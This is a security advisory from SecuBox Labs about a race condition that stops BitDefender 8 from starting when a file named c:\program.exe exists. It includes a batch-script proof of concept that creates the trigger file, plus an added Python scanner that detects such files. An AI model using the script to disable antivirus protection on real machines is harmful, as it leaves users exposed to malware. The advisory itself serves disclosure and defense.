
BitDefender 8 - Race condition vulnerability




-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------

BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data 
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com


VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Possibly others...


RACE CONDITION
--------------
At Windows startup, when a file named program.exe is found in c:\,
Windows displays an alert message. The message box controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup.
(Sorry, I don't have the exact English message.)

At this point BitDefender cannot start, so the session runs without virus
protection.
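
Added example, not part of the original advisory: a defender-side check for the trigger file described above. Windows raises that startup alert because a file named "Program" at the drive root can be run in place of programs under "Program Files" when a path is not quoted, so this sketch goes beyond c:\program.exe and flags any root file that shadows a directory whose name contains a space. The function name find_shadowing_files and the EXECUTABLE_EXTS list are assumptions made for this example.

```python
import os

# Extensions treated as executable here; an assumed list for this example.
EXECUTABLE_EXTS = {"", ".exe", ".com", ".bat", ".cmd"}


def find_shadowing_files(root):
    """Return sorted names of files in `root` that shadow a spaced directory.

    A file shadows a directory when its name without the extension equals
    the text before the first space in the directory name, ignoring case
    (for example "program.exe" next to "Program Files").
    """
    entries = os.listdir(root)

    # Collect the first word of every directory whose name contains a space.
    prefixes = set()
    for name in entries:
        if " " in name and os.path.isdir(os.path.join(root, name)):
            first_word = name.split(" ", 1)[0].lower()
            if first_word:
                prefixes.add(first_word)

    # Flag plain files whose base name collides with one of those words.
    hits = []
    for name in entries:
        if not os.path.isfile(os.path.join(root, name)):
            continue
        stem, ext = os.path.splitext(name)
        if ext.lower() in EXECUTABLE_EXTS and stem.lower() in prefixes:
            hits.append(name)
    return sorted(hits)


if __name__ == "__main__":
    import sys

    # Default to the system drive root used in the advisory.
    root = sys.argv[1] if len(sys.argv) > 1 else "C:\\"
    for name in find_shadowing_files(root):
        print("WARNING: %s in %s shadows a directory name" % (name, root))
```

Run it against each fixed drive root, for example from a logon or scheduled audit script; any hit should be investigated before the next reboot.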


PROOF OF CONCEPT
----------------
Open notepad.exe and paste this batch script.

@echo off
echo #-------------------------------------------------------#
echo [   SecuBox - Proof of Concept        (04.12.2005)      ]
echo #-------------------------------------------------------#
echo # This script just create the race condition.           #
echo # It might be use by virus.                             #
echo # Now, reboot your computer and watch your BitDef !     #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient !      #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit


EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.


VENDOR STATUS
-------------
The vendor has been contacted but has not replied ...


CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@xxxxxxxxxxx
----------------------